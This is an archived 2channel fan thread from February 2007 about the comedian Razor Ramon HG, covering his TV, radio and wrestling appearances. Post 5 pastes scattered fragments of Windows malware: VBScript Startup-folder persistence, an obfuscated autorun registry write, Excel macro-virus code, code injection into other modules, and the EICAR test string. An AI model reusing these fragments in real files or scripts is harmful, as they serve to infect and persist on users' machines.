2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ハードゲイ】レイザーラモンHG住谷【118スレフゥ〜】

1 :名無しさん@板分割議論中:2007/02/03(土) 19:13:10
□■□■メ欄sage(←半角)以外の人にレスする事や、荒れ防止のため相方の叩きも禁止 □■□■
↓テンプレ必読! >>1-10あたりまで必読フォー↓
【ハードゲイマナー】【うp等に関するお約束】【プロフィール】

【まとめサイト】
ttp://plz.rakuten.co.jp/ryusaku/
ttp://hgmatome.fc2web.com/

※age荒らしや暴言厨が周期的に沸きますがハードな心で華麗にスルー
※アンチスレがありますのでアンチの方はそちらでどうぞ。
※900超えたあたりでテンプレ貼りなど、次スレ準備に入ります。
※920踏んだ人は 宣言してから 次スレ立てお願いします。
※スレ立て出来ない人は950過ぎたら書き込みは自粛して下さい

前スレ
【ハードゲイ】レイザーラモンHG住谷【117スレフゥ〜】
http://tv9.2ch.net/test/read.cgi/geinin/1164630918/

2 :名無しさん@板分割議論中:2007/02/03(土) 19:19:10
【ハードゲイマナー】
・sage推奨。sageないヤシは荒らしとみなす。
・メ欄がsage(半角)以外のヤシへのレス禁止。
・いずどん叩き厳禁。
・煽り、荒らしは放置汁。放置できないヤシも荒らしと同類
・実況厳禁。実況板逝け
・既女、アンチスレのヲチ禁止


□■sageの方法■□
____       ________             ________
|書き込む| 名前: |           .| E-mail(省略可): .|sage         |
 ̄ ̄ ̄ ̄        ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄              ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                               ∧_∧   。  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                              ( ´∀`) / < ここに「sage」(半角)と
                              (つ  つ    | 入れて下さい
                             | ̄ ̄ ̄ ̄ ̄|   \_____________
                             |          |
                             |          |
                        | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|

3 :名無しさん@板分割議論中:2007/02/03(土) 19:19:46
【プロフィール】
・レイザーラモンHG(住谷正樹)
昭和50年 12月18日生まれ 30歳 射手座 B型
出世時の体重: 4200g
身長:185cm 体重:85kg
趣味:絵 家具作り アメリカンプロレス
同志社プロレス同盟(DWA)出身
吉本興業所属

1997年、相方、出渕誠とコンビ「レイザーラモン」結成。
同年、「今宮子供えびすマンザイ新人コンクール」で福笑い大賞を受賞。
2000年、「ABCお笑い新人グランプリ」で審査員特別賞を受賞。
2001年、吉本新喜劇入団。
小藪千豊(元ビリジアン)とのユニット「ビッグポルノ」としても活動中。
ハードゲイキャラで全国区ゴールデンに出演中。



4 :名無しさん@板分割議論中:2007/02/03(土) 19:20:45
【CD等リリース情報】
◆YOUNG MAN 【CD+DVD 2枚組】  発売中
ttp://www.hmv.co.jp/product/detail.asp?sku=1407822
ttp://www.randc.jp/hg/top.html

【DVDリリース情報】
◆新喜劇フゥ〜! 発売中
ttp://www.hmv.co.jp/product/detail.asp?sku=1424842

◆月刊よしもと本物流: 2006.1月号: 青版
レイザーラモン ハードバトル
HMV限定で発売中
ttp://www.hmv.co.jp/product/detail.asp?sku=1413386
レンタル版
月刊DVDよしもと本物流Vol.7 2006.1月号青版
ttp://www.fandango.co.jp/yw/r_blue200601.html

◆ビッグポルノ 発売中
ttp://www.hmv.co.jp/product/detail.asp?sku=1433606

ハッスル注入DVD 4/28発売
ハッスルマニア2005 5/26発売



5 :名無しさん@板分割議論中:2007/02/03(土) 19:34:47
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


6 :名無しさん@板分割議論中:2007/02/03(土) 19:49:53
コンビやRG中心の話はコッチ↓
【HG・RG】レイザーラモン6【住谷・出渕】
ttp://tv7.2ch.net/test/read.cgi/geinin/1154856954/l50

出演番組・雑誌掲載などの詳しい事が知りたいならコッチ↓
HGが藤井と同じく全くゲイでもオカマでもなかった
ttp://tv7.2ch.net/test/read.cgi/geinin/1153383118/l50


7 :名無しさん@板分割議論中:2007/02/03(土) 20:01:34
ハッスル3月シリーズ

3月15日(木) ハッスルハウスVol22 後楽園ホール  開場18:00 開演19:00
3月18日(日) ハッスル21  愛知県体育館 開場16:00 開演17:00 



8 :名無しさん@板分割議論中:2007/02/03(土) 20:07:03
フーサン乙だよ

9 :名無しさん@板分割議論中:2007/02/04(日) 18:09:29
★〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓★
           3・15後楽園ホール、3・18愛知県体育館
        ハッスル3月シリーズ 4日10時から一斉発売開始!
★〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓★ 


10 :名無しさん@板分割議論中:2007/02/05(月) 21:11:03
次のジャパノラマ放送っていつだろ

11 :名無しさん@板分割議論中:2007/02/05(月) 23:04:56
ラジかる、
おかだとのやりとりワロス。

12 :レイサーラモソHG:2007/02/05(月) 23:08:14
落ち目フォーー

13 :名無しさん@板分割議論中:2007/02/05(月) 23:14:04
>>11
ラジカル、リアルタイムで見れていいなー
前にうp神の見たら先生が普通の人になってて驚いた
ハリセンでバシバシ叩くイメージだったから

14 :たいたひかろ:2007/02/05(月) 23:33:11
♪どうでもいいですよ♪

15 :名無しさん@板分割議論中:2007/02/06(火) 09:04:00
あんちんの歯茎フォーーー

16 :名無しさん@板分割議論中:2007/02/06(火) 10:59:04
粘着が消えますように

17 :名無しさん@板分割議論中:2007/02/06(火) 11:09:28
>>10
かなり前にも収録してたよな。閣下とかマエケンもいて。

18 :HG:2007/02/06(火) 12:25:23
さあ、このスレも荒らしますよ〜。

19 :名無しさん@板分割議論中:2007/02/06(火) 19:35:06















創価学会員(芸術部副部長) 久本雅美が会合で涙ながらに池田名誉会長を大絶賛する映像
http://www.youtube.com/watch?v=xxim0nN9KuM

20 :名無しさん@板分割議論中:2007/02/06(火) 21:38:39
【テレビ情報】

2月12日(月)〜2月16日(金) 24:35〜24:45 tvk 深海魚 

21 :名無しさん@板分割議論中:2007/02/06(火) 21:45:55
ふつーに仕事して夜バラエティみてると、HGはまったくみかけません。

22 :名無しさん@板分割議論中:2007/02/06(火) 21:52:52
フラッシュ見た。
アニキの師匠は、
ケンコバだったな。

23 :名無しさん@板分割議論中:2007/02/06(火) 22:28:28
>>22
置いてなかったから気になってたんだ。
やっぱケンコバか。トン。

24 :名無しさん@板分割議論中:2007/02/07(水) 00:55:52
北海道で先月下旬に
ロンブー淳とロケしてたんだとよ
3/5にテレ朝で放送されるんだとよ

25 :名無しさん@板分割議論中:2007/02/07(水) 01:21:10
あれ、自分は亮と北海道ロケしてるって目撃情報見たよ
亮とはマッスルだろうけど、淳だし局違うし、なんの番組だろ?曜日違うけどロンハー?

26 :名無しさん@板分割議論中:2007/02/07(水) 02:07:00
ありゃ??もう一回見たら日テレになってる・・
んだけど淳のままでマッスルの曜日に合わない・・
やってる事はマッスルっぽいから間違えてるだけか?
マッスルといえば5人揃って先週宮城に来たんだとよ

27 :名無しさん@板分割議論中:2007/02/07(水) 07:14:24
>>24-26
トン。どっちも寒い地方だーw

28 :名無しさん@板分割議論中:2007/02/07(水) 07:16:14
>>23
でも元をたどれば、
バッファロー吾郎さんということになる。

29 :名無しさん@板分割議論中:2007/02/07(水) 08:32:37
>>26
淳と亮が間違われるのはよくあることらしい(自分ロンブーヲタもやってた)
日にちが違うのは気になるけど、たぶんマッスルだろうね。いつもより寒くないからアニキもまだ楽、かな?

30 :名無しさん@板分割議論中:2007/02/07(水) 08:46:31
さんま御殿にはいつ出るんだろ。
三流芸人ですら出てるのに。

31 :名無しさん@板分割議論中:2007/02/07(水) 13:41:13
今日はコンビニに出没?
何の撮影なんだ?

32 :名無しさん@板分割議論中:2007/02/07(水) 13:46:09
そういう情報どこから見つけてくるの?

33 :名無しさん@板分割議論中:2007/02/07(水) 13:49:28
目立つからよく目撃されてるな

34 :名無しさん@板分割議論中:2007/02/07(水) 14:10:56
>>30
日テレっ子なのに不思議とまだ出ないよね。
たぶんプロデューサーが好んでないのかも・・。

35 :名無しさん@板分割議論中:2007/02/07(水) 14:14:05
御殿は一桁で低迷してるから春の改編でなくなるかもな


36 :名無しさん@板分割議論中:2007/02/07(水) 14:19:25
さんま御殿視聴率悪いんだ。
売れてる若手芸人で出てないのHGくらいだよね。
品庄やワッキーなんかしょっちゅう出てる気がする。

37 :名無しさん@板分割議論中:2007/02/07(水) 14:30:42
御殿はギリギリ二桁いってるよ。
それよりずっと一桁の笑金が一番ヤバイ。

38 :名無しさん@板分割議論中:2007/02/07(水) 14:39:21
さんちゃんねるも悪くてさんまは今不調だよ。ワンマン振りに視聴者も食傷気味なんじゃないか。
自分も苦手だ。HGに色んな番組に出て欲しいのは同意だけど。

>>37
笑金も低いな。しかし打ち切りの噂はあっても気配がないところを見ると
テレ朝的にはおkなのか。業界全般で情報バラエティ>お笑いだからな。

39 :名無しさん@板分割議論中:2007/02/07(水) 14:44:50
HGってさんまの番組に結構出てるイメージあるけど御殿は出てないんだ。
ヘキサゴンはもう呼ばれることはないだろうね・・。


40 :名無しさん@板分割議論中:2007/02/07(水) 14:46:20
>>31
それBBCのことだよ。たぶん…

41 :名無しさん@板分割議論中:2007/02/07(水) 20:43:43
駅でも目撃されてるからBBCとは別かも

42 :名無しさん@板分割議論中:2007/02/08(木) 07:55:51
なんのロケだろう。

43 :名無しさん@板分割議論中:2007/02/08(木) 17:21:45
23時からbayfmで亮のラジオ

44 :名無しさん@板分割議論中:2007/02/08(木) 20:00:40
bayfm入らないしなあ

45 :名無しさん@板分割議論中:2007/02/08(木) 20:24:01
>>44
前スレに書いてた人いたけどHPから配信されてる。明日17時頃の予定。


46 :名無しさん@板分割議論中:2007/02/09(金) 06:37:42
>>45
サンクス。

47 :名無しさん@板分割議論中:2007/02/09(金) 18:15:57
bay fm 聞けるようになってる。
面白いww

48 :名無しさん@板分割議論中:2007/02/09(金) 18:30:54
FlashGet 使いでダウンロードできますよ

49 :名無しさん@板分割議論中:2007/02/09(金) 18:53:08
亮が指摘してたキャラに全うできてないのは嫁の原因。

50 :名無しさん@板分割議論中:2007/02/09(金) 18:59:53
庄司やさしいなw
ロケ中、嫁とメールばっかしてるらしいね。

51 :名無しさん@板分割議論中:2007/02/09(金) 19:26:35
マッスルで嫁の名前叫んでたのは萎えた。

52 :名無しさん@板分割議論中:2007/02/09(金) 19:29:28
あの場やったらしょうがないやん

53 :名無しさん@板分割議論中:2007/02/09(金) 19:32:39
ラジオでメールの話なんかしてなかったよね?編集されてたようだけど。
別にしてても全然構わないけど。

54 :名無しさん@板分割議論中:2007/02/09(金) 19:39:28
石黒賢が好きなんて白々しいな。
実際にゲイに迫られたら嫌がるくせに。

55 :名無しさん@板分割議論中:2007/02/09(金) 19:41:12
文句いいながらも聴いてるおまいらカワイイヨおまいら


56 :名無しさん@板分割議論中:2007/02/09(金) 19:46:19
>>48
それだとasxのままDLしちゃうからネットトランスポート使ったほうがいい。
>>55
本当に、おまい「ら」かな?

57 :名無しさん@板分割議論中:2007/02/09(金) 19:50:42
住谷杏奈w

58 :55:2007/02/09(金) 19:52:49
>>56
あっホントだw

59 :名無しさん@板分割議論中:2007/02/09(金) 20:55:56
3月の単独ライブ、あんちんの旦那さんも出るんだよね?

60 :名無しさん@板分割議論中:2007/02/09(金) 21:26:30
ラジオ、いろんな話が聞けて、
楽しかった。

61 : ◆k.gT81IHGw :2007/02/09(金) 22:17:03
HGワロスwww

62 :名無しさん@板分割議論中:2007/02/09(金) 22:18:34
>>61
トリップキー教えてくれ

63 :名無しさん@板分割議論中:2007/02/09(金) 22:42:51
ハッスルの話も聞けてよかった。

64 : ◆k.gT81IHGw :2007/02/09(金) 22:43:25
じゃあヒント

「歌手」

65 :名無しさん@板分割議論中:2007/02/09(金) 22:51:33
>>64
幅広いなーw
偶然見つけたの?

66 :名無しさん@板分割議論中:2007/02/09(金) 22:59:53
>>65
色んなトリップテストしてて、偶然HGwになりました

67 :名無しさん@板分割議論中:2007/02/10(土) 07:46:10
【アニキのテレビ出演情報】

2/17(土)7:57〜8:54 フジテレビ めちゃ2イケてるッ!



68 :67:2007/02/10(土) 07:56:37
時間間違えた

2/17(土)19:57〜20:54 フジテレビ めちゃ2イケてるッ!

69 :名無しさん@板分割議論中:2007/02/10(土) 09:47:38
めちゃ2イケ出るんだあ。
楽しみだな。

70 :名無しさん@板分割議論中:2007/02/10(土) 12:11:55
>>68
よりによって寝起きクワガタ選手権かよwwwww

71 :名無しさん@板分割議論中:2007/02/10(土) 12:21:53
今日は渋谷解放区か

72 :名無しさん@板分割議論中:2007/02/10(土) 14:17:45
ハッスル公式サイトで、
単独ライブの告知。

73 :名無しさん@板分割議論中:2007/02/10(土) 20:01:17
メチャいけ、
来週の予告やるかな。

74 :名無しさん@板分割議論中:2007/02/10(土) 20:30:14
>>1
agesageは自由でしょ?

75 :名無しさん@板分割議論中:2007/02/10(土) 21:01:46
>>73
なかったお

76 :名無しさん@板分割議論中:2007/02/10(土) 22:17:34
花より男子を携帯で見れるとこあったら教えてください(+_+) 神さまお願いヲ

77 :名無しさん@板分割議論中:2007/02/10(土) 22:19:21
スレ違いだけど釣りか?

78 :名無しさん@板分割議論中:2007/02/10(土) 22:26:27
こいよベネット!

79 :名無しさん@板分割議論中:2007/02/10(土) 22:30:37
釣りじゃないです…バクテンでやったヤツです

80 :名無しさん@板分割議論中:2007/02/10(土) 22:33:06
>>79
ここのyoutube動画検索で探してみたら?
ttp://fileseek.net/

81 :名無しさん@板分割議論中:2007/02/10(土) 22:35:36
ありがとう 探してみます(^^)

82 :名無しさん@板分割議論中:2007/02/10(土) 22:41:59
一体何が始まるんです?

83 :名無しさん@板分割議論中:2007/02/10(土) 23:01:01
80 さん ありましたぁ有難う(^.^)

84 :名無しさん@板分割議論中:2007/02/10(土) 23:07:44
次からはsageてお

85 :名無しさん@板分割議論中:2007/02/10(土) 23:16:28
クワガタ選手権でるのかw

86 :名無しさん@板分割議論中:2007/02/10(土) 23:21:20
>>85
うん、来週だよ。

87 :名無しさん@板分割議論中:2007/02/10(土) 23:35:02
>>84
age/sageは自由ですよ。
フロート式掲示板の機能を使わないなんてもったいない。

書き込む人の自由です。

88 :名無しさん@板分割議論中:2007/02/10(土) 23:58:23
>>25
亮がラジオで北海道ロケの話してたからマッスルだ。

89 :名無しさん@板分割議論中:2007/02/11(日) 09:34:38
今日のいただきマッスルは出ないのか。
来週は出るみたいだが。

90 :名無しさん@板分割議論中:2007/02/11(日) 12:30:43
ハッスルフー
先週の頂マッスル・渋谷ストリートライブ解放区うp

91 :名無しさん@板分割議論中:2007/02/11(日) 18:13:48
>>90
フーさんありがとう。

92 :名無しさん@板分割議論中:2007/02/11(日) 21:20:22
>>90
フーさん、
いつもサンクスです。


93 :名無しさん@板分割議論中:2007/02/11(日) 22:41:00
渋谷歌の時間がツライ

94 :名無しさん@板分割議論中:2007/02/11(日) 23:16:47
>>93
歌の部分を、
ピューって早送りすればいい。

95 :名無しさん@板分割議論中:2007/02/12(月) 09:12:21
【アニキのラジオ出演】

2/13(火)13:20〜14:00 吉田照美やるきまんまん
やっぱり危ない照美の小部屋

『ふぉーーーーーーっ!!』
DJ TERU出演の「ラジかるッ」でもおなじみのあの方です。真冬でも関係ないない、あの
格好で登場です!

http://www.joqr.co.jp/yaruman/

96 :名無しさん@板分割議論中:2007/02/12(月) 12:18:38
明日仕事だから、
ラジオ聞けないな。

97 :名無しさん@板分割議論中:2007/02/12(月) 12:49:59
>>96
そうだよね。やるマン出るの凄いけど、平日の昼じゃあねぇ。
今日だったら聞けたのに。

98 :名無しさん@板分割議論中:2007/02/12(月) 13:53:23
フーさん、明日のラジオお願い。

99 :名無しさん@板分割議論中:2007/02/12(月) 14:00:37
>>98
ラジオは無理。

100 :名無しさん@板分割議論中:2007/02/12(月) 14:12:19
>>99
あぁフーさん律儀に…。いつもありがとう。

101 :名無しさん@板分割議論中:2007/02/12(月) 14:14:55
ラジオなんかよりもバラエティ出てほしいよ・・。

102 :名無しさん@板分割議論中:2007/02/12(月) 15:41:36
レポぐらいならできるかとオモタが関西では聴けないのか

103 :名無しさん@板分割議論中:2007/02/13(火) 07:27:02
ラジオ聞けないのは残念だ。
まあ、しょうがないか。

104 :名無しさん@板分割議論中:2007/02/13(火) 20:41:12
深海魚てどんな感じですか?

105 :名無しさん@板分割議論中:2007/02/13(火) 21:19:48
ラジオ聞いたけど、いつもと同じ話だったよ。
生い立ちやら生協やら漫才で優勝した話。
吉田照美がバクテンをよく見ていたらしく
「あれ、面白かったな〜」と好意的だった。


106 :名無しさん@板分割議論中:2007/02/13(火) 21:24:22
>>105
サンクス

107 :名無しさん@板分割議論中:2007/02/13(火) 21:48:15
>>95
ゲストの寄せ書き帳、
金曜日更新だって

108 :名無しさん@板分割議論中:2007/02/14(水) 07:12:42
今日はバレンタインデーか。
アニキにチョコバナナ贈りたいな。

109 :名無しさん@板分割議論中:2007/02/14(水) 09:24:09
昨年より貰うチョコ少ないんだろうね

110 :名無しさん@板分割議論中:2007/02/14(水) 09:37:53
結婚したからね・・。
今年はタカトシ、チュートリアルあたりが多そうだな。

111 :名無しさん@板分割議論中:2007/02/14(水) 13:55:34
うーん。結婚は関係なく、チョコは迷惑かなと思って送るのはやめた口。
鍛えてる人には嬉しいもんでもないだろうし、食べないだろうし。
しかし吉本では大体、送られてきたチョコは社員が食う、という話だがw

112 :名無しさん@板分割議論中:2007/02/14(水) 14:03:39
奥さんからは絶対もらうんだろうなぁ。
確かにHGってチョコ食べなそうだよねw

113 :名無しさん@板分割議論中:2007/02/14(水) 14:15:14
社員が食べるて偉いなー吉本。捨てるか食費もままならない人らにあげるのかと。

114 :名無しさん@板分割議論中:2007/02/14(水) 16:40:56
テレビジョンに1ページ丸まるめちゃイケの特集でHGが載ってる。
面白いか大ケガするかどちらかに傾きそうな内容だ。

115 :名無しさん@板分割議論中:2007/02/14(水) 17:05:12
>>114
なんちゅーカッコだww

116 :名無しさん@板分割議論中:2007/02/14(水) 20:02:11
>>105

まだそんななんだ・・

芸&ゲイをなめきってるとしかいえないな。

117 :名無しさん@板分割議論中:2007/02/14(水) 20:30:54
>>114
テレビジョン見た。
めちゃいけ、楽しみだね。

118 :名無しさん@板分割議論中:2007/02/14(水) 20:34:39
高田総統が旧ハッスル軍壊滅指令 小川vsTAJIRIが決定=ハッスル

ttp://sportsnavi.yahoo.co.jp/fight/other/headlines/wrestling/20070214-00000023-spnavi-fight.html


119 :名無しさん@板分割議論中:2007/02/14(水) 20:54:19
▼3・18『ハッスル21』(愛知県体育館)
HG VS タイガー・ジェット・シン

マジかよ

120 :名無しさん@板分割議論中:2007/02/14(水) 21:05:22
>>119
mjd-!!!!!

121 :名無しさん@板分割議論中:2007/02/14(水) 21:29:51
フーさんは、
生観戦行くのかな。

122 :名無しさん@板分割議論中:2007/02/14(水) 21:32:55
>>119
うーわー見たい!けど、関東者からすると無理だよ愛知は orz
何でハウス22とハッスル21が逆じゃないんだー!
せめてハッスル21が土曜日だったらなあ…。

123 :名無しさん@板分割議論中:2007/02/15(木) 10:27:59
愛知の人いいなあ

124 :名無しさん@板分割議論中:2007/02/15(木) 15:27:15
・・。

125 :名無しさん@板分割議論中:2007/02/15(木) 15:55:19
>>119
なるトモでこの事言ってた

126 :名無しさん@板分割議論中:2007/02/15(木) 17:57:54
“印の狂虎”シンがHG&RG狩る

ttp://www.daily.co.jp/ring/2007/02/15/0000242043.shtml

127 :名無しさん@板分割議論中:2007/02/15(木) 20:24:12
めちゃいけの予告ムービー

http://wwwz.fujitv.co.jp/flvplayer/flvalone_komado.html?Pathes=variety/mechaike/070217mechaike

128 :名無しさん@板分割議論中:2007/02/15(木) 21:46:00
>>125
最近のHGは絵を描いてるそうだね。
GEISAIみたいにまた何かに出展するのかな?

129 :名無しさん@板分割議論中:2007/02/15(木) 23:30:17
HGレイザーラモン大好き
テレビに出ると必ず見るけど
でも最近、見たくなくなってきた
RGが一緒に出てたりするんだもん
RGキモすぎ
五流のRGがくっつくといっぺんに泥臭くなって三流半になってしまう
HGも分かってたと思うんだけど断れなかったんだろうな


130 :名無しさん@板分割議論中:2007/02/15(木) 23:37:45
>>129
(・∀・)カエレ!

131 :名無しさん@板分割議論中:2007/02/16(金) 00:16:24
HG......今は休んどけ。
また来年お前の年が来る!!!


132 :名無しさん@板分割議論中:2007/02/16(金) 07:28:40
宮川大輔のブログで、QJの特集についての話でお礼を言われてます。
コメントとかしたのかも。一読オススメ。

133 :名無しさん@板分割議論中:2007/02/16(金) 08:17:46
おととしの暮れのギャラはしっかり貯めているんだろうな

134 :名無しさん@板分割議論中:2007/02/16(金) 08:43:12
お願いだからRG離れてあげて
このままじゃ共倒れになっちゃう

135 :名無しさん@板分割議論中:2007/02/16(金) 09:05:36
RGよりもツナマンが離れるべきだ!

136 :名無しさん@板分割議論中:2007/02/16(金) 11:16:49
>>132
まだ見れてないけど竹山が表紙のヤツかな?

137 :名無しさん@板分割議論中:2007/02/16(金) 14:00:33
>>135
ツナマンそんなに出ていないし、マイナスにはなってないし
RGは最悪
観ていて醜悪、あんな嫌味な芸人、他に類をみない
RGがくっつけば田舎のどさ回りしかできないよ
それも地方の村役場の二階の畳敷き集会所でタダでお年寄り50人ほど集めてさ
だからRGさん、お願いします、HGから離れてください
HGもRGも本当は分かってるのに切り出せないんだね、きっと


138 :名無しさん@板分割議論中:2007/02/16(金) 15:31:27
ハッスルではRG頑張ってるじゃん。
RGが原因でファンが減ったとは思えないけどなあ。


139 :名無しさん@板分割議論中:2007/02/16(金) 15:35:32
>>138
>>1

140 :名無しさん@板分割議論中:2007/02/16(金) 16:45:00
>>138
RGがしゃしゃり出だしたとき、これでHGは終わりだと思ったわ
HGの追っかけしたときに知り合った友達も同じこと言ってたし、その子も
テレビつけてRGも出ていたら観ないって言ってたもんね
女から言わせてもらえばRGはキモ過ぎて受け入れられないよ

141 :名無しさん@板分割議論中:2007/02/16(金) 16:54:45
じゃあRG捨ててツナとコンビ組めばいいじゃん。

142 :名無しさん@板分割議論中:2007/02/16(金) 17:10:40
HGはピンでいけるじゃん、ってゆうかピンで光る芸人さんだと思う
何でスカ芸人とわざわざコンビ組まなきゃいかんの
吉本はRGに泣き疲れて飛ぶ鳥おとす勢いのHGと抱合せ販売したのかも知れないけど
あんなのくっ付けられたら誰でも人気無くなるわ
視聴者は引くもん
ためしに猫ひろしにRGくっ付けてみな、とたんに猫はテレビから消えるから

143 :名無しさん@板分割議論中:2007/02/16(金) 17:38:54
>>107
更新されてたよ

144 :名無しさん@板分割議論中:2007/02/16(金) 17:45:41
>>142
君はHGを盲信しすぎ。
HGはロケで無茶させたら面白いし、下ネタやツッコミが上手いけど、
彼も彼で欠点だらけだよ。大喜利は下手だしトークはだらけるしピンネタも酷い。
まあ、だからといってRGは足なんか引っ張ってません!><って言うわけにはいかないけど。
その欠点をRGが補えればいいけど、彼は補わ(え)ずに自分のキャラやネタばっか考えている。
己がハネるのがコンビにとって一番いいと考えているのかもしれないが、無茶な話だよ。

145 :名無しさん@板分割議論中:2007/02/16(金) 18:07:09
>>144
私はHGが一流芸人だとは思ってないし、完璧にネタをこなせる芸人とも思ってないし、期待もしてないし
でもそこがかわいいっていうか、ちょっと気になるエロカッコイイ男なんです
欠点を補ってやろうなんてのはRGの余計なお世話の押し売りでしかなく、それによってHGが油ギトギト糞まみれになったのです
RGも芸人の端くれだから自分が出ることによってHGの値打ちが下がることは分かっていたはず
でも背に腹は代えられない、しゃしゃり出だした
RGに芸があればHGのジャマにならない程度のことは出来たかも知れないけど、あまりにも芸と脳みそがなさすぎた
むしろ自分が目立とうとした
それは芸で目立つのではなくグロで目立つことをした
だからフアンは見限ったのよ
HG見ようとしてるのに、その前にウンコやゲロが置いてあるんだもん(この場合のウンコ・ゲロはRG)
いやよ、そんなの見せられるの
だから皆んな見なくなってきたのよ
少なくとも私と友達はそう
他の人達もそれが多いと思うけど

146 :名無しさん@板分割議論中:2007/02/16(金) 18:12:41
>>143
d。荒らしにウンザリしてたところに力強いなw

147 :名無しさん@板分割議論中:2007/02/16(金) 18:39:51
荒らしてる奴、ブロガー仲間の奴か?

148 :名無しさん@板分割議論中:2007/02/16(金) 19:47:00
やる気マンマンの寄せがき帳
いかにもアニキらしくてワロス

http://www.joqr.co.jp/yaruman/

149 :名無しさん@板分割議論中:2007/02/16(金) 22:07:51
>>148
日付間違ってるねw

150 :名無しさん@板分割議論中:2007/02/16(金) 23:39:27
今日ルミネで新コスチューム初めて見た。
赤いラインやポイントが入っていた。
既出ならスマン。

151 :名無しさん@板分割議論中:2007/02/16(金) 23:54:17
>>150
どもども。初耳だ。
黒ベースで赤のポイントが付いてるてことかな?

152 :名無しさん@板分割議論中:2007/02/17(土) 00:41:49
>>151
そうそう、そんな感じ。
前のファスナー部分に赤いライン、
帽子、背中、お尻の「HG」の文字に赤いポイント。
手首にも少し赤い模様があったかな。
襟に少し黒いファーのような物が付いてたよ。
2週間位前にパンツだけ新しいのをはいていたけど、
上下とも新コスチュームになったのは初めて見た。

153 :名無しさん@板分割議論中:2007/02/17(土) 02:21:22
ありがd

154 :名無しさん@板分割議論中:2007/02/17(土) 12:56:35
おまいの気持ちわかるよ

155 :名無しさん@板分割議論中:2007/02/17(土) 14:45:53
マッスル

トップページで明日の番宣動画
ttp://www.mmt-tv.co.jp/

ロケの裏側&プレゼント
ttp://www.mmt-tv.co.jp/muscle/index.htm

156 :名無しさん@板分割議論中:2007/02/17(土) 19:54:28
めちゃいけ実況

http://live23.2ch.net/test/read.cgi/livecx/1171707032/

157 :名無しさん@板分割議論中:2007/02/17(土) 20:53:38
めちゃイケ、面白かった。
思いっきりハッスルって言ってたなw

158 :名無しさん@板分割議論中:2007/02/17(土) 21:00:31
きんにくんに辛うじて勝った?

159 :名無しさん@板分割議論中:2007/02/17(土) 21:00:39
うん、ハッスル戦士て言ってたし映像も流れてたw

160 :名無しさん@板分割議論中:2007/02/17(土) 21:04:19
>>158
きんに二秒だったからな

161 :名無しさん@板分割議論中:2007/02/17(土) 22:35:08
あー見逃した…

162 :名無しさん@板分割議論中:2007/02/17(土) 23:41:32
立ちくらみワロス 

163 :名無しさん@板分割議論中:2007/02/18(日) 01:44:35
面白かったのにカキコミ少ないな

164 :名無しさん@板分割議論中:2007/02/18(日) 07:57:16
あれって、
マジ痛そうだな。

165 :名無しさん@板分割議論中:2007/02/18(日) 09:46:45
セクシーなTバックはいてたな。

166 :名無しさん@板分割議論中:2007/02/18(日) 11:30:05
上から描かれた目がホンモノと激似で、矢部の小さい目にワロタ。

167 :名無しさん@板分割議論中:2007/02/18(日) 12:23:45
いただきマッスル実況

http://live23.2ch.net/test/read.cgi/liventv/1171767658/

168 :名無しさん@板分割議論中:2007/02/18(日) 13:34:55
ホットパンツ焼けしててワロタ

169 :名無しさん@板分割議論中:2007/02/18(日) 17:28:48
短パンでやろうと必死になっていたのがワロス

170 :名無しさん@板分割議論中:2007/02/18(日) 17:46:07
>>169
今日のマッスルのことかな。155見たけど
久しぶりに全員だし面白そうだね。

171 :名無しさん@板分割議論中:2007/02/18(日) 22:47:15
戴きマッスル見てこのスレ来た
HGの、オケツを突き出すお辞儀がプロレスムーブぽくって好きだな

172 :名無しさん@板分割議論中:2007/02/19(月) 00:19:41
>>171
番組を見たってことか。
確かにあのポーズは面白いな。

173 :名無しさん@板分割議論中:2007/02/19(月) 01:31:48
oh〜shi〜ri〜

174 :名無しさん@板分割議論中:2007/02/19(月) 02:26:28
あれ大嫌い
まぁファンじゃないからどうでもいいが

175 :名無しさん@板分割議論中:2007/02/19(月) 09:01:22
ブロガー達がキモイんですけど。
自分もHGファンだけどあれはちょっと引くわ・・。

176 :名無しさん@板分割議論中:2007/02/19(月) 10:50:51
お祝いコメント
ttp://www.imgup.org/iup335043.jpg.html

177 :名無しさん@板分割議論中:2007/02/19(月) 11:23:43
さっきのラジかるで、
新コス

178 :名無しさん@板分割議論中:2007/02/19(月) 11:37:56
>>177
サンクス。暫くはソレでいくのか。

179 :名無しさん@板分割議論中:2007/02/19(月) 11:41:55
>>175
そんなキモいものをいちいちチェックしてここに報告にこないでいいよ。
教えてもらっても、わざわざ見に行きたくもないし。

180 :名無しさん@板分割議論中:2007/02/19(月) 11:46:57
めちゃイケ、てっきりやり直しして茶番フォーかと思ってたけど
さすがにそれは無かったかw

どうでもいいけど、いつもあのクワガタが潰されないか心配になる
きんに君はまるで忍者のような身のこなしだったよ(なのに起きても、頭は
ぼけぼけだったが)


